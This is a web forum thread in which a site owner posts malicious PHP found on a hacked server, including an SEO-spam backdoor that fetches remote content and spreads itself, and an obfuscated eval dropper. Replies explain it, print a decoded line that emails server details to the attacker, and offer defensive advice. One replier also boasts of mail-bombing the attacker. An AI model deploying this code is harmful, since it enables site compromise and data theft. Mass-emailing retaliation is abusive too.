Jump to content

Recommended Posts

I recently had my site hacked and found hundreds of hidden links had appeared at the bottom of my index page.There were some newly created error.log files and there was a newly created php file in the root directory as well. Here are the contents of the php file if anyone can read through it and explain what this code does:

 

<?php
error_reporting(0);

$srand = "548";
$q = "due";
$abbr = "calyptra";
$ftro = "creation";
$admin = "i";
$relwrit = "./";

$_1 = "y"; $_2="o"; $_3 = "u";
$base = "cnV0aWxzLmNvbQ==";


if($_GET[$ftro]){
$zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/1.txt");
print str_replace("<?"."="."$"."q"."?>",$q,str_replace("<?="."$"."abbr"."?>",$abbr,$zz));
exit;
}


if($_GET['touch']){ if(file_exists("index.php")) $nm = "index.php"; if(file_exists("index.html")) $nm = "index.html"; if(file_exists("index.shtml")) $nm = "index.shtml"; if(file_exists("index.phtml")) $nm = "index.phtml"; if(file_exists("index.htm")) $nm = "index.htm"; print "Touching... ".$_SERVER['PHP_SELF']; $time = @filemtime($nm); if(@touch($_SERVER['PHP_SELF'],$time)) print "....OK"; exit; }

if($_GET['httpd_setup']){
$d = dir("./");
while (false !== ($entry = $d->read())) {
   if($entry!="."&&$entry!=".."){
	if(is_dir($entry))$go[] = $entry;
   }
}
$d->close();

function qq($length = 5)
{
  $password = "";
  $possible = "aaskljasdjabzcxnmaeoipqrehwejkavansbvsnadbv"; 
  $i = 0; 
  while ($i < $length) { 
    $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
    if (!strstr($password, $char)) { 
      $password .= $char;
      $i++;
    }
  }
  return $password;
};

$i = "UTJsU01FbEVNR2RKYVRSMVRIbEpOME5wVW5sSlJEQm5TV2sxYjJSSE1YTkphbk5MWVZkWmIwbFhXbkJpUjFabVdsaG9jR016VW5wTFExSXdUR2xLY0dKdFVteGxRMGwxU2toSmNFdFRRV3RqYVVFNVNVTkpkV0ZJVW5SSmFuTkxZVmRaYjBsWFduQmlSMVptV2xob2NHTXpVbnBMUTFJd1RHbEtjR0p0VW14bFEwbDFTa2hKY0V0VFFXdGphVUU1U1VOSmRXTkhhSGRKYW5OTFEyMXNiVXREVW1aU01GWlZWM2xrYUZwSFVXNVlVMnczUTJsU2VWcFhSbXRKUkRCbllVaFNkR0pHT1d4aWJsSndaRWhzWmxwSFZtcGlNbEpzUzBkc2RHTkhlSFphUjFWdlNubGpjMXB0YkhOYVUyZHJaRU0wYVdGWE5XdGFXR2RwVEdsU2VVdFRhM0JQZDI5TFlWZFpiMGxYVm5sYVYyTnZTV3AzYUV4VE1VMVRWVFZNVlhreFRWTlZOVXhWZVRCMFVHbEpjMHBJU214WlYxRndTMWh6UzBOVFVtMWpRMEU1U1VkYWRtTkhWblZMUTFJd1RHbEtjR0p0VW14bFEwbDFTa2hKYzBsdVkybExWSE5MUTFkc2JVdEhXak5qYld3d1dsTm5hMXB1UVhOS1NFcHNXVmRSZFVsc2VIVlFRMFYwVEZWNFNsUnJkRlJNVlhoS1ZHdDBWRXhUTUN0SmFXdHdTVWhDZVdGWE5UQkpRMHBVV2xoU01XTkhWbXRNYVRSMVNXcHpTME5YV21waVJ6bDZXbE5uYTFwdVFYQlBkM0E1U1VkV2MyTXlWV2RqU0Vwd1ltNVJaMGxyUm5OamJWWm9Xa2hyZFV4cE5IVkphbk5MUTI0d1MwTnRiRzFMUTFKbVVqQldWVmQ1WkcxS01UQndaWGR2YTFwcFFUbEpSMXB3WWtkV1psb3lWakJZTWs1MlltNVNiR0p1VW5wTFExSm1VakJXVlZkNVpHMUtNVEJ3VDNkd2QyTnRiSFZrUTBGcldtcHpTMHBJU214WlYxRm5VRk5DYjJSSE1YTllNbFoxWkVkc01HVldPV3RhVjA1MldrZFZiMkZYTVhkaVJ6bHJXbE5uYmtwNWVHMWhWM2hzUzBOU01FeHBTbkJpYlZKc1pVTkpkVXBJU1hCTFUyczNRMjFzYlV0SFZubGFWMk52U1dwM2FFeFRNVTFUVlRWTVZYa3hUVk5WTlV4VmVUQjBVR2xKYzBwSVNteFpWMUZ3UzFoelMwTlJhMnRhV0dkblVGTkNiR1ZJUW5OaU1sSnNTME5KT0VsVE1IUlVSV3hQVXpGTmRGUkZiRTlUTVUxMFRGUTBhVXhEVW5sYVYwWnJTMVJ6UzBOUmEydGFibU5uVUZOQmExcFlhR0pOUmpCMVNXcDNhRXhUTVUxVFZUVk1WWGt4VFZOVk5VeFZlVEIwVUdsSmRVcEhXVGREWjJ0S1NrZGFkMGxFTUdkYWJUbDNXbGMwYjBwSVVYVkpiV3gxV2tkV05FbHBOR3RqYVhkcFpIbEpjRTkzYjBwRFYyeHRTMGRhTTJOdGJEQmFVMmRyV201QmMwcEhXak5MVTJ0blkwaEtjR0p1VVdkSmFuaHZUVlExTjFRd2MyaG1WSGQyWVVSRkswbHFjMHREVVd4dFdUSjRkbU15Vlc5S1IxcDNTMVJ6UzJaUmIwdG1VVzg5";

$scrp = base64_decode(base64_decode(base64_decode($i)));

$towrite = $go[mt_rand(0,count($go)-1)];
$qq = qq();
$fp = fopen($towrite."/".$qq.".php","w");
if(fwrite($fp,"<?php ".$scrp." ?>")) print "http://".$_SERVER['HTTP_HOST']."/".$towrite."/".$qq.".php";
else print "false";
fclose($fp);
exit;
}


if($_GET[$q]||$_GET[$admin]):
function IsBot() {
global $ref;
if(substr_count($ref,"&")<3) return true;
else return false;
};

function IsRefSE() {
global $ref;
if(substr_count($ref,"&")>2) return true;
else return false;
};

function logit($fname, $str){
$fp = @fopen ($fname, "a+");
@fwrite ($fp, $str);
@fclose ($fp);
if(file_exists("index.php")) $nm = "index.php";
if(file_exists("index.html")) $nm = "index.html";
if(file_exists("index.shtml")) $nm = "index.shtml";
if(file_exists("index.phtml")) $nm = "index.phtml";
if(file_exists("index.htm")) $nm = "index.htm";

    $time = @filemtime($nm);
    @touch($fname,$time);
};

$ref	=	$_SERVER['HTTP_REFERER']; $varquery = $_GET[$q];
$host	=	$_SERVER["HTTP_HOST"]; $agent	=	$_SERVER["HTTP_USER_AGENT"];  $ips	=	$_SERVER['REMOTE_ADDR'];  
$req	=	$_SERVER["REQUEST_URI"]; $http	=	$_SERVER['HTTP_HOST']; $self	=	$_SERVER['PHP_SELF'];
if(ereg("index",$self)) $self = str_replace("index.php","",$self);

if ($_GET[$admin]=='b'){ print '<pre>'.@file_get_contents($relwrit.'error.log').'</pre>'; exit;  }
    if ($_GET[$admin]=='s'){ print '<pre>'.@file_get_contents($relwrit.'error1.log').'</pre>'; exit; }
if ($_GET[$admin]=='n'){ print '<pre>'.@file_get_contents($relwrit.'error2.log').'</pre>'; exit; }

if (IsBot()==true){ logit($relwrit."error.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n"); }
else if(IsRefSE()==true) {  

logit($relwrit."error1.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$ref."\t".$agent."\t".$ips."\n"); 

$zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/2.txt");
header("Location: ".$zz);
exit;

}
else { logit($relwrit."error2.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n"); }

function GetPage($url) {
$url=str_replace("http://", "", $url);
$host=substr($url,0,strpos($url,"/"));
$path=substr($url,strpos($url,"/"));

$skt = @fsockopen($host, 80);
if (!$skt) return false;

	$requestHeader = "GET ".$path."  HTTP/1.1\r\n";
	$requestHeader.= "Host: ".$host."\r\n";
	$requestHeader.= "Connection: close\r\n\r\n";

		fwrite($skt, $requestHeader);

	$responseHeader = "";
	$responseContent = "";

	do{
		$responseHeader.= fread($skt, 1);
	  }
	while (!preg_match("/\r\n\r\n$/", $responseHeader));

	if (!strstr($responseHeader, "Transfer-Encoding: chunked")) {
		while (!feof($skt)) {
                        $responseContent.= fgets($skt, 128);
                    }
	}
	else {
		while ($chunk_length = hexdec(fgets($skt))) {
                        $responseContentChunk = "";
                        $read_length = 0;

				while ($read_length < $chunk_length) {
                            $responseContentChunk .= fread($skt, $chunk_length - $read_length);
                            $read_length = strlen($responseContentChunk);
                        }
                        $responseContent.= $responseContentChunk;
                        fgets($skt);
                    }
                }
           return chop($responseContent);
};

function GetRelatedGoogle($q) {
global $srand;
$q=trim(strtolower($q));
$url="http://www.google.com/search?hl=en&safe=off&tbo=1&q=".urlencode($q)."&tbs=clue:1";

$content=GetPage($url);
preg_match_all("#sceq(.*)amp#U", $content, $result_preg);

foreach($result_preg[0] as $op){
$op = str_replace("sceq:","",$op);
$op = str_replace("&","",$op);
$op = str_replace("+"," ",$op);
$op = str_replace("amp"," ",$op);
@$arr[] = $op;
}

srand($srand);
shuffle($arr);
$result=$arr;

return $result;
};

function GetRelated($q){
		$q=trim(strtolower($q));
		$url="http://www.google.com/trends/hottrends?q=".urlencode($q);
		$content=GetPage($url);
		preg_match_all("#<b>Related searches:</b><br>(.*)<br><br>#U", $content, $result_preg);
		$result=trim($result_preg[1][0]);
		$result=explode(',',$result);
		return $result;
};

function GetYoutube($q){
global $relwrit;
		$q=urlencode(trim(strtolower($q)));
		$url = "http://www.youtube.com/results?search_query=".$q."&search_type=&aq=f";
		$content=GetPage($url);
		preg_match_all('#video-long-title-(.*)"#U', $content, $result_preg);
		$result = $result_preg[1];
		return $result;

}
$page = ucwords(str_replace("-"," ",$_GET[$q]));
$page = ucwords($page);

$serp = GetPage("http://www.google.com/search?hl=en&as_q=".urlencode(strtolower($page))."&as_epq=&as_oq=&as_eq=&num=32&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=(cc_publicdomain|cc_attribute|cc_sharealike|cc_noncommercial).-(cc_nonderived)&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images");

preg_match_all('#<div class="s">(.*)<b>...</b></div>#U',$serp,$rs);

$newsg = array();
foreach($rs[1] as $output){
	$output = html_entity_decode(strip_tags($output));
	$newsg[] = $output;
}


$serp2 = GetPage("http://www.google.com/search?hl=en&sa=G&tbo=1&q=".urlencode(strtolower($page))."&tbs=nws:1&num=39");
preg_match_all("#</nobr><br><div>(.*)</div>#U",$serp2,$rs2);

foreach($rs2[1] as $output2){
	$output2 = html_entity_decode(strip_tags($output2));
	$newsg[] = $output2;
}


@srand($srand);
@shuffle($newsg);
$today = date("F d, Y");

$rels = GetRelated($page);
foreach($rels as $kro){
$kro = trim($kro);
$url = str_replace(" ","-",$kro);
if($kro) $relis .= "<li> <a href=\"http://{$http}{$self}?{$q}={$url}\">".ucwords($kro)."</a> </li> ";
}

@srand(633);
@shuffle($relis);

$cont = '';
for($i=0;$i<count($newsg);$i++){
$cont .= "".str_replace("...","",trim(ucfirst($newsg[$i]))).". <br /><br />\n\n ";
}

$rel = GetRelatedGoogle($page);

for($i=0;$i<count($rel);$i++){
$undretit .= "".trim($rel[$i]).", ";
}
$undretit = substr(trim($undretit), 0, -1);
$relis = substr(trim($relis), 0, -1);
/*
*/

//*******************************
if($_GET['ddd']){
$susel = '';
$over = '';
$alrt  = '';
}else{
//$susel = "<script>".$q."('".$abbr."', '".$page."');</script>";
//$over = "style=\"overflow: hidden;\"";
$susel = '';
$over = '';
}


$pg = "
<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"> 
<html xmlns=\"http://www.w3.org/1999/xhtml\" dir=\"ltr\"> 
    <head profile=\"http://www.webdevout.net/profile/1.5/\"> 
<title>$page</title>
$susel
    </head> 
<style>
*{
font-family: Courier New;
}
hr {
height:2px;
color:#263731
#rauki{
left: 296px;
height: 616px;
margin: 23px;
}
#abelu{
background-color: #616283;
}
#ubeal{
color: #663061;
font-family: Times New Roman;
}
#irebo{
font-size: 25px;
}
#eolud{
}
#kuoiabr{
border: 5px #672045 dashed;
font-size: 13px;
color: #192957;
}
#earldbo{
border: 5px #124619 solid;
font-size: 15px;
color: #353664;
}
#oerlka{
color: #399028;
border: 9px #895357 dotted;
font-size: 12px;
}
#ardule{
color: #214920;
border: 5px #163620 dashed;
font-size: 15px;
}
#irkude{
color: #427449;
border: 7px #485044 dashed;
font-size: 11px;
}
#eabrou{
color: #141898;
border: 5px #859459 dashed;
font-size: 11px;
}

</style>
</head>
<body id=\"abelu\">
<div id=\"rauki\">
<h4 id=\"ubeal\">$page</h4>
<p><div><br /> <div></p>
<div id=\"oerlka\">
<div id=\"ardule\">
<div id=\"irkude\">
<div id=\"eabrou\">
<h2>$today $page</h2>
<div id=\"irebo\">$cont</div>
<ol>
$relis
</ol>
</div>
</div>
</div>
</div>
<div id=\"eolud\">
<div id=\"kuoiabr\">
<div id=\"earldbo\">
$undretit
</div>
</div>
</div>
</div>
</body>
</html>

";

print $pg;


exit;
endif;
?>

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/
Share on other sites

That file was uploaded to your server (no idea how) but it basically has given the person responsible the ability to execute PHP..

First it reads a file from yourutils.com/1.txt ( a repoted hack site )

which runs a few eval functions on your system.

 

Further down in the code it iterated through your file system to find the index file type you are using and appends some of its stuff in there. Thats as far as ive gotten thus far but from other looks I would assume that they are using those created log files to change their methods to suit your server..

 

I wouldnt REALLY worry about what it does.. Just how it got there and future prevention.

Do you have any upload scripts on your server?

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995548
Share on other sites

Thanks

 

How it got there is a mystery. I have no upload scripts or forms. I am a hosting reseller and noticed that 3 of my customers sites had the same hack. I also noticed that the hundreds of links that were appended to the page were all customers of the same hosting company that I resell (according to whois). Each link had a randomly named php file at the end e.g. domain.com/hackfile.php?hyt=a_story_about_someone

 

Of course the hosting company in question denied that it was a hole in their security and that it must have been my site that was hacked.

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995555
Share on other sites

If you are using a ftp client to upload your files and you saved the passwords in that client, there is a possibility that a virus stole those passwords.

 

Also try a search on this forum, you might find topics that could be of use to you.

 

here are some:

http://www.phpfreaks.com/forums/index.php/topic,268580.msg1267048.html#msg1267048

 

http://www.phpfreaks.com/forums/index.php/topic,252960.msg1188182.html#msg1188182

 

http://www.phpfreaks.com/forums/index.php/topic,249837.msg1170921.html#msg1170921

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995615
Share on other sites

Yes, it seems one way or another they found an exploit in the permissions or script structure and executed a shell to upload files to batch away at their will with their poorly written code.

 

I'd recommend to change all passwords, Especially your (cPanel|Plesk) and FTP/admin area. It may be a good idea to check server logs (apache's) and see if there was anything going on from a client, or it was an 'inside job'.

 

EDIT: '$fp = fopen($towrite."/".$qq.".php","w");' , The script may be spreading itself.

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995617
Share on other sites

The host I use allows me and any of it's customers to log on with SSH access which apparently enables anyone to access any other accounts files on the server - but accessing any files other than your own is forbidden and logged...apparently. Do you think one customer could have logged in to the server this way undetected or just took the risk of not being noticed and planted the files, or even a single file that can spread to all index pages on the server?

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-995620
Share on other sites

Quick update if anyone can help. I tracked down a text file that the hacker has somehow managed to run on my site - it is hosted on another victims site.

 

The text contains the following code:

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>
<?
function d($s, $k='')
{
if($k=='')
{
for($i=0;$i<strlen($s);$i){
$d.=chr(hexdec(substr($s, $i, 2)));
$i=(float)($i)+2;
}
return $d;}
else{
$r='';
$f=d('6261736536345f6465636f6465');
$u=$f('Z3ppbmZsYXRl');
$s=$u($f($s));
for($i=0;
$i<strlen($s);$i++){
$c=substr($s, $i, 1);
$kc=substr($k, ($i%strlen($k))-1, 1);
$c=chr(ord($c)-ord($kc));
$r.=$c;
}return $r;
}
}
eval(d("VZL7TuJAGMUfbfcV1HUJoMnakVvqLUqhpVNoYVpmaBvRXul0hqq0XOpGH3HR7CbuvyfnJL/zfYdGtTov8jSv/VzXj3pGr3K8ub4STo7HqFKl+Span1aKXwd3unRY2d5cs0eeh/WT94im1Wq1dvleXS55eHh98EODRvmAZcFrwCtnqZWONRPslsnnQGS2mfAZacvhdFvgZ+ohhhtmKsnB0iAou6PojbzMqbo1TJiPty2oSZNXx3H5PQAbW8H5pORpcN5fuu6zqKeiMaBcHEqktInN4yWg9pmjEIGqVt9JNGul97hJ50TnhqmtogHZGLSzgbzF7gVdtrirYr5bmvJkitUL1Rb0qQrATpNvTIRVYtqabwhQtjBRMSARxirUmqCj3wqaqrRZQJx4bN5tfU2KKW4lHsGrobWLocK2UAGLB4AFm7RbQ8lAaCqMyYDE2EJ9i+67lXLqzW7Lf75H5eItUoymTSYs5MkXvvL/LAef2aAxpT7vinoXxZZAMGEuImWgEtWc3J8lYwugF3vP0ptkLHCNTJeExYCXO8Q0E1nZQoNakgAceBnZOaTNVKXXhrK5nmPAidKW45myCBrDD42mpJv4DeMp5G+FiW8/tOekv1ujD+Ze8dlX512WKCHzS3jRnxSpk6mbAO/5Uqf0zoEIJb2Ag6D0XbTWmRiTV8BH9O/feItOFbTxzssepGI6AyMZP7myw/IMyeYMyzcDC4ym+9uvddqk+hboAdGefClefNnaBu53EBL1ZSR32YLomSZ1Mzcz1r6Zdo5vjqLfj7zmeUXSaYZBFGRhfFrhqziq1y6/f4t3WX75Bw==", 1235327122));
?>

 

Does anyone know what this code is supposed to be trying to do?

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996137
Share on other sites

Its grabs a whole heap of your server settings and emails it..

$creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from);

 

the email's are being sent to ban.dage07@gmail.com

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996315
Share on other sites

Its grabs a whole heap of your server settings and emails it..

$creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from);

 

the email's are being sent to ban.dage07@gmail.com

 

Botnet + gmail's lack of origin awareness checking = ..

 

I sent atleast 72k e-mails with random .cn domain names. Bleh, anyway, selecting secure passwords on the first place is a good thing OP, I'd recommend evaluating every aspect of your web server and scripts (a backup?) and start new, not your fault.

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996319
Share on other sites

This is a example why validating all your code is so important.

 

also show's you why members must have accounts to upload stuff.

 

Dam people.

 

so many people wanting to get account info/ user names/passwords.

 

as hosting get cheaper, the more people want to use other peoples accounts.

 

sheared host are so bad these days due to lack off security.

 

makes me so mad...

 

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996579
Share on other sites

Nice work people! Thanks! So now we have his email, can anything be done about it?

 

I sent him 74k e-mails of his own code, so I think he'll be busy enough to miss yours. There isn't much to be done really, just not many laws in place that can really support this, or prove it.

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996591
Share on other sites

:)

 

I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest.

 

http://disk.yonghyuk.pe.kr/comet/id1.txt

http://musicadelibreria.net/footer

http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996596
Share on other sites

:)

 

I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest.

 

http://disk.yonghyuk.pe.kr/comet/id1.txt

http://musicadelibreria.net/footer

http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt

 

http://whois.domaintools.com/musicadelibreria.net

http://www.nic.ru/whois/?query=forex-biznes.ru

 

They look like to be honest botnetted/ or a relay from an infected site like your own. Be sure to block any data coming/going to these adresses you may want to disallow the IPs of them in a .htaccess file to deny any possible traffic for later preventative measures.

Link to comment
https://forums.phpfreaks.com/topic/188570-hackers-code/#findComment-996597
Share on other sites

  • 1 month later...
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.